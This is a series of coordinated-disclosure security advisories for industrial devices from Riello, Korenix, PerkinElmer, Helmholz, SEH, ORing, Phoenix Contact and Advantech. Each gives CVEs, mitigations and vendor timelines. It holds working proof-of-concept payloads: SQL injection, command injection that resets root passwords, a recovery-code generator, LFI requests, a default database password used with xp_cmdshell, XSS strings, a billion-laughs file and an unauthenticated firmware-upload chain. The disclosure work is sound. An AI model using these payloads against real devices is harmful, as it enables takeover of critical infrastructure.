The Netman 204 series is prone to unauthenticated SQL injection that allows modification of energy measurement entries. Furthermore, the UPS password reset function can be abused to reset the password without the riello support by calculating the recovery code for resetting the password.

„Riello Elettronica, lead by Cav. Lav. Pierantonio Riello, has a presence today in the Electrical manufacturing industry with two divisions: Energy, Automation and Security. It is a leader in the Uninterruptible Power Supply market with the well-known brand Riello UPS. Energy represents the Group’s core business, in particular with the manufacture of UPS that are firstly able to guarantee the quality of electricity and secondly maintain normal operation and continuity in case of blackouts or anomalies in the energy supply. Riello UPS designs and produces strategical solutions for every kind of requirement and make a bespoke offering according to the clients’ needs: from banks to the hospitals, transport to infrastructures, from domestic use to data centres.“

Source: https://www.riello-ups.com/pages/41-the-riello-elettronica-group

NetMan 204 / 4.05

1) SQL Injection (CVE-2024-8877)
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.

2) Unauthenticated Password Reset (CVE-2024-8878)
By navigating to the endpoint /recoverpassword.html an attacker can gather the netmanid from the UPS. This id can be used to calculate the recovery code for resetting the password. This way enables an attacker to take over control of the UPS and e.g. turn it off.

The system is subsceptible to SQL injections, which is illustrated by the following payloads:

AND 1=0:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%270

AND 1=1:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271

The first request does not return any data, while the second request returns all entries with a start and end date in the given interval.

import hashlib
import sys
def calc_code(netman_id):
secret = b“NMP“
netman_id = secret + netman_id[3:]
round1 = hashlib.md5(netman_id).hexdigest().encode(‚utf-8‘)
round2 = hashlib.sha1(round1).hexdigest()
code = round2[5:5+7]
return code
if len(sys.argv) < 2:
sys.exit(„usage: {} netman_id“.format(sys.argv[0]))
netman_id = sys.argv[1]
print(calc_code(netman_id.encode(‚utf-8‘))

None.

Limit access to the device.

Riello should release a firmware update that fixes the mentioned vulnerabilities.
Customers should not use this device in productive networks.

• 2024-05-21: Contacting Riello UPS Group via riello@riello-ups.com.
• 2024-06-06: Contacting Riello UPS Group via security-incident@riello-ups.com.
• 2024-06-10: Received confirmation that the issue is being looked into.
• 2024-07-22: Asking Riello UPS Group for a status of the update.
• 2024-07-22: Contact stated that there is no planned date for the update.
• 2024-08-05: Asking Riello UPS Group for a status of the update and telling them that the advisory will be published on 2024-09-19 after a 90-day period as stated in our Responsible Disclosure Agreement.
• 2024-08-07: Contact stated that there are no news regarding the update and that it would take longer than 2024-09-19.
• 2024-08-13: Asking Riello UPS Group about news on the update and a possible release date.
• 2024-08-26: Contact stated that there are is no information regarding the update.
• 2024-09-19: Advisory published.

The JetPort series is prone to unauthenicated command injection, which allows an attacker to fully compromise the device from the network.

„Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. […]“

Source: https://www.korenix.com/en/about/index.aspx?kind=3

JetPort 5601v3 / v1.2

1) Insufficient Authentication (CVE-2024-7395)
The configuration service on port 600/tcp doesnt require authentication to be used. This allows an attacker to change the password or other critical information.

2) Plaintext Communication (CVE-2024-7396)
The communication of the configuration service is transmitted in plain text. An attacker could use this information to sniff passwords or other critical information.

3) Unauthenticated Command Injection (CVE-2024-7397)
An attacker with network access an can execute arbitrary commands as root user via the management service on port 600/tcp.

The management software JetPort Commander is used as an frontend for the telnet service on 600/tcp. While it is possible to set a password, the passwords gets sent to the software in cleartext and gets validated on the client software rather than on the device. An attacker can bypass the management software by using telnet to directly connect to the port. This allows him to reconfigure the device including passwords and access controls.

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‚^]‘.
-> setpassword poc

target:/$ cat /tmp/com2ip.conf
version:1.2.0
model:JetPort5601v3
name:JetPort5601v3-DEFAULT
serialno:0000000000000000
password:poc
switchmode:redundant
network:static:192.168.122.76:192.168.10.1:192.168.10.1

# sudo tcpdump -i virbr0 dst port 600 -X
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21
0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@…m…z.
0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL…XR+`…3}
0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v…setpassw
0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‚^]‘.
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1
OK
->

target:/$ ls -rtlha /tmp/
drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..
-rw-r–r– 1 root 0 4 Apr 4 12:28 thttpd.pid
-rw-r–r– 1 root 0 712 Apr 4 12:29 com2ip.conf
-rw-r–r– 1 root 0 0 Apr 4 12:33 pwned

None. Device is End-of-Life.

Limit the access to the device and place it within a segmented network.

CyberDanube recommends customers from Korenix to remove the device from their network topology.

• 2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
• 2024-05-07: Received confirmation that the issue is beeing looked into.
• 2024-06-10: Contact stated that the product is considered EoL and will no longer receive security updates.
• 2024-06-10: Confirm receipt and telling them that we will publish the advisory after our 90-days deadline.
• 2024-08-05: Publication of the Advisory.

The ProcessPlus measurement software is prone to local file inclusion, uses default MSSQL credentials, and is executed with unnecessarily high privileges.

„For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. We’ve always pursued science with a clear purpose – to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers’ desire to work better, innovate better, and create better.

PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products.“

Source: https://www.perkinelmer.com/

ProcessPlus Software / <=1.11.6507.0

1) Unauthenticated Local File Inclusion (CVE-2024-6911)
A LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host.

3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user „sa“ to connect to the database. Access to this account allows an attacker to execute commands via the „xp_cmdshell“ procedure.

The LFI can be triggered by using the following GET Request:

GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1
Host: 192.168.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

This example returns the content from „C:\Windows\System32\drivers\etc\hosts“ of an affected installation.

[…]
<OPCDA_Server dbconnectstring=“Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno“ application_id=“1″
appid=“Perten.OPCDA.Server“ loglevel=“info“
logfile=“C:\Perten\ProcessPlus\Log\opcserver.log“>
[…]

msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

Name Current Setting
—- —————
CMD dir
PASSWORD enilno
RHOSTS 192.168.0.1
RPORT 1433
TDSENCRYPTION false
TECHNIQUE xp_cmdshell
USERNAME sa
USE_WINDOWS_AUTHENT false

msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.0.1

[*] 192.168.0.1:1433 – SQL Query: EXEC master..xp_cmdshell ‚dir‘

[…]
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
[…]

Update to version 2.0.0.

Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself.

CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface.

• 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.
• 2024-05-13: Vendor asked for unencrypted advisory.
• 2024-05-16: Sent advisory to vendor.
• 2024-05-22: Asked for status update. No answer.
• 2024-05-28: Asked for status update. Contact stated that they are working on a fix.
• 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer.
• 2024-07-13: Asked for status update.
• 2024-07-15: Contact stated, that all three issues have been fixed in version 2.0.0 which have been released on 2024-07-11.
• 2024-07-16: Asked for a link to the firmware update release.
• 2024-07-17: Set release date to 2024-07-22.
• 2024-07-22: Coordinated release of security advisory.

The Helmholz REX100 Router ist prone to an authenticated command injection attack. This allows an attacker to gain root access on the router, which usually acts as key infrastructure device in OT.

Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.

Source: https://www.helmholz.de/en/company/about-helmholz/

Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11

1) Authenticated Command Injection (CVE-2024-5672)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

GET /cgi-bin/ping;echo$IFS’root:password’|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for ‚root‘ changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[…]

Update to latest version: 2.2.13

None

CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.

• 2024-05-15: Contacting Helmholz via psirt@helmholz.de.
• 2024-05-15: Receiving security contact for MBConnectline.
• 2024-05-21: Contact stated they are working on a fix.
• 2024-06-13: Received advisory from contact and assigned CVE number.
• 2024-07-01: Contact sends out final release date.
• 2024-07-03: Coordinated release of advisory with CERT@VDE.

The untserver Pro ist prone to stored cross-site scripting, file disclosure and denial of service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the untserver.

We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.

Source: https://www.seh-technology.com/us/company/about-us.html

utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

1) Stored Cross-Site Scripting (CVE-2024-5420)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. This can be triggered by sending a lot of requests that trigger serial interface access on the device.

„><script>alert(document.location)</script>

A hidden function in the web-interface of the device can be used to disclose directories and files on operating system level. The function can be accessed directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

#!/bin/bash
echo „Parameters: $1 $2“
last_iter=$(($2 – 1))
for ((i=1; i<=$2; i++))
do
echo „[$i] Downloading application binary“
if [[ „$i“ == „$last_iter“ ]];then
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null &
fi
done

Install firmware version 20.1.28 to fix the vulnerabilities.

None

CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.

• 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
• 2024-03-20: Asked for an update. Contact stated, that an internal timeline will be defined.
• 2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will be patched soon.
• 2024-04-16: Contact sent link to patched firmware release candidate.
• 2024-05-31: Notified SEH Computertechnik that advisory will be released first week of June. Received confirmation from SEH Computertechnik.
• 2024-06-04: Coordinated release of security advisory.

The ORing IAP420 is prone to authenticated command injection and stored cross-site scripting. Therefore, an attacker can fully compromize the device via the management interface.

Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.

Source: https://oringnet.com/en/about-us/company-profile

Tested on ORing IAP420 / 2.01e

1) Stored Cross-Site Scripting (CVE-2024-5410)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. The SSID of the WiFi can be configured to contain arbitrary JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated Command Injection (CVE-2024-5411)
The filename parameter of the config file upload is prone to a Command Injection vulnerability. This vulnerability can only be exploited if a user is authenticated to the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

POST /cgi-bin/wl_set.cgi HTTP/1.1
Host: 192.168.0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 659
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&
sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&
sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&
rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&
tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&
tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&
lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&
wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&
wep_key_index=0&ret_msg=

A command can be injected in the filename of the uploaded config. By sending a request as shown below, the content of the current directory can be shown:

POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—————————347087158737672164432057801583
Content-Length: 563
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“upfile“; filename=“test.bin;ls${IFS}-la;“

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“bt_upconf“

Upload
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“lang“

en
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“ret_msg_upconf“

—————————–347087158737672164432057801583–

HTTP/1.0 200 OK
tar: can’t open ‚/tmp/test.bin‘: No such file or directory
drwxr-xr-x 4 root root 1024 Mar 7 14:36 .
drwxr-xr-x 8 root root 1024 Jan 30 2024 ..
-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi
-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi
-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi
-rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi
-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi
-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi
-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi
-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi
-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi
[…]

None

None

CyberDanube recommends Oring customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.

• 2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.
• 2024-02-19: Asking for an update. No reply.
• 2024-02-28: Asking for an update. No reply.
• 2024-03-11: Searched for „cyber security manager“ on LinkedIn. Contacted him and got the answer, that the content should be sent to „support@oringnet.com“. Sent the advisory to this address directly.
• 2024-03-20: Asking for an update. No reply.
• 2024-04-10: Asking for an update. No reply.
• 2024-04-30: Including support_us@oringnet.com. Asking for an update. No reply.
• 2024-05-02: Including support_eu@oringnet.com. Asking for an update. No reply.
• 2024-05-27: Sent information that the advisory will be published on 2024-05-28.
• 2024-05-28: Public release of security advisory.

Korenix JetNet series is prone to a unauthenticated firmware upgrade, which leads to remote code execution.

„Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]“

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

1) TFTP Without Authentication (CVE-2023-5376)
The available tftp service is accessable without user authentication. This allows the user to upload and download files to the restricted „/home“ folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

The Linux tftp client was used to upload a firmware to the absolute path „/home/firmware.bin“:

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

class FirmwarePart:
def init(self, name, offset, size):
self.name = name
self.offset = offset
self.size = size

firmware_parts = [
FirmwarePart(„uimage_header“, 0x0, 0x40),
FirmwarePart(„uimage_kernel“, 0x40, 0x3c54),
FirmwarePart(„gzip“, 0x3c94, 0x14a000 – 0x3c94),
FirmwarePart(„squashfs“, 0x14a000, 0x539000 – 0x14a000),
FirmwarePart(„metadata“, 0x539000, 5480448 – 0x539000),
]

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int32_t check_file(const char* arg1) {
FILE* r0 = fopen(arg1, „rb“);

if (!r0) {
return 0xffffffff;
}

int32_t filechecksum = 0;
int32_t last_data_size = 0;
int32_t file_size = 0;
uint8_t data_buf[4096];
int32_t data_len = 1;

while (data_len > 0) {
data_len = fread(data_buf, 1, sizeof(data_buf), r0);

if (data_len == 0) {
break;
}

int32_t counter = 0;
while (counter < (data_len >> 2)) {
int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
counter++;
filechecksum += byte_at_counter;
}

file_size += data_len;
last_data_size = data_len;
}

fclose(r0);

if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size – 0x14a
000) > 0x5ac000)) {
return 0xffffffff;
}

data_len = 0;
while (data_len < (last_data_size >> 2)) {
int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
data_len++;
filechecksum -= r3_2;
}

return filechecksum;
}

int main(int argc, char* argv[]) {
if (argc != 2) {
printf(„Usage: %s <file_path>\n“, argv[0]);
return 1;
}

int32_t result = check_file(argv[1]);
printf(„0x%x\n“, result);

return 0;
}

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e „\x00\x00\x00\x1f\x00\x00\x00\x01\x01“ | nc -u $IP 5010

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don’t turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:
…
Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see „Workaround“ section).

Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

This commands should be used to deactivate the TFTP daemon on the device to
prevent unauthenticated actors from abusing the service.

Regardless to the current state of the vulnerability, CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

• 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
• 31-08-2023: Receiving contact information. Send vulnerability information.
• 26-09-2023: Asking about vulnerability status and receiving update release date.
• 27-10-2023: Received update from contact regarding the firmware update.
• 29-11-2023: Meeting with contact stating that it effects the whole series.
• 31-11-2023: Meeting to discuss potential solutions.
• 11-12-2023: Release delayed due to lack of workaround from manufacturer.
• 21-12-2023: Manufacturer provides workaround. Release date confirmed.
• 09-01-2024: Coordinated release of security advisory.

Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and Billion laughs attack.

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggerd in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may be also stoled via this way.

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15″><script>alert(„document.cookie“)</script>

The following configuration file can be used to exploit the binary

„/usr/bin/xmlconfig“, which supportes entity reference nodes:
===============================================================================
<?xml version=“1.0″?>
<!DOCTYPE lolz [
<!ENTITY lol „lol“>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 „&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;“>
<!ENTITY lol2
„&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;“>
<!ENTITY lol3
„&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;“>
<!ENTITY lol4
„&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;“>
<!ENTITY lol5
„&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;“>
<!ENTITY lol6
„&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;“>
<!ENTITY lol7
„&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;“>
<!ENTITY lol8
„&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;“>
<!ENTITY lol9
„&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;“>
]>
<lolz>&lol9;</lolz>
===============================================================================

Update to the latest available firmware version.

None.

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.

• 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
• 2023-05-17: Vendor informed internal product team.
• 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
• 2023-05-19: Vendor needs more time to fix the issues.
• 2023-06-15: Vendor asked for an explaination of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
  Offered an MS Teams call to clarify the issues.
• 2023-06-16: Scheduled a call for 2023-06-19.
• 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
• 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
• 2023-07-13: Received CVE numbers from vendor.
• 2023-07-18: Received firmware versions from vendor.
• 2023-07-23:_Vendor released firmwares.
• 2023-08-08: Coordinated release of security advisory.

Advantech EKI-1524/1522/1521 devices are prone to multiple Stored Cross-Site Scripting (XSS).

„Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.“

Source: https://www.advantech.com/en/about

EKI-1524-CE series / 1.21 (CVE-2023-4202)
EKI-1522-CE series / 1.21 (CVE-2023-4202)
EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203)
EKI-1522-CE series / 1.24 (CVE-2023-4203)
EKI-1521-CE series / 1.24 (CVE-2023-4203)

1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)
Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the „Device Name“ field and the second XSS was found in the „Ping“ tool. This can be exploited in the context of a victim’s session.

Both cross-site scripting vulnerabilities are permanently affecting the device.

The first vulnerability can be triggerd by setting the device name
(„System->Device Name“) to the following value:

„><script>alert(„document.cookie“)</script>

This code prints out the cached cookies to the screen.

http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513

Upgrade to the newest available firmware.

None.

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

• 2023-05-16: Contacting vendor via security contact.
• 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.
  The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue.
• 2023-05-25: Contact stated that new firmware should resolve the issue.
• 2023-06-03: Sent new payload to the vendor.
